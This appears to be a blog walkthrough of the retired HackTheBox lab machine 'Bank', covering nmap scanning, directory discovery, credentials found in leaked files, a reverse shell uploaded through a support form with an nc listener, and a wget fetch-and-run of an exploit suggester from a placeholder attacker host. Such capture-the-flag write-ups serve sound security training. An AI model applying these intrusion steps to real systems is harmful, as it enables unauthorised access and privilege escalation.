Bank Walkthrough
Hey folks, we are back again with one of HackTheBox retired machines βBankβ, before we talk about it letβs take a look at its info
Letβs get startedβ¦
Nmap Scan
We usually start our scan with nmap scan to discover all open ports, service running, OS detection, etc
nmap -A -T4 -oG bank.gnmap 10.10.10.29
We have 3 open ports ssh/dns/http
Iβve tried to brute-force ssh credentials and search for vhosts or zone transfer but it fails so letβs go to the next step, nothing important here
Web Enumeration
If you try to open 10.10.10.29:80 you will get the default page of the server
But if you try echo "10.10.10.29 bank.htb" > /etc/hosts and search for http://bank.htb you will get a different page βLogin portalβ and by using this plugin I know that it redirects me to an unknown page before getting the login portal.
Letβs start to discover the hidden directories by using dirbuster/gobuster/ffuf/dirsearch
You will get more of a bunch of directories which is open and available.
After discovering them, Iβve big data in the last one /balance_transfer
Note that all these files have the same size, but thereβs one has a different size, so we will open it first
Good, we found credentials, letβs use them to login to the login portal
Here we go! Nice design :)
User Flag
After discovering the whole account, I found an upload function on bank.htb/support and then we grabbed a reverse shell from here and then uploaded it
The next step is to open nc as a listener on the port which I insert to the shell code nc -lvp <port> and then access the shell form the website
Nice, weβre in the server now but unfortunately in the user priv not root so letβs grab the user.txt first and then try to be root
Root Flag
Itβs time now to grab the root.txt. Iβve used Linux-Exploit-Suggester to know which vulnerabilities the machine is affected by downloading it on the attack machine and then transferring it to the vulnerable machine
Iβve used python -m SimpleHTTPServer 80 to make the attacker machine act as a server, and then go to /tmp the directory in the vulnerable machine to have permission to write there and then downloaded wget http://<attacker-machine-ip>/<file-name> and it was downloaded. Letβs execute it
We have 4 vulnerabilities that works on this machine but unfortunately, thereβs no one of them works with me, so Iβll try to discover all directories to find any juicy file which gave me a root access
After minutes, I found this directory /var/htb
And have this executable file
As you can see Iβve tried to execute it, but itβs failed so I execute it from the bin directory, and itβs worked as you can see β€
Last updated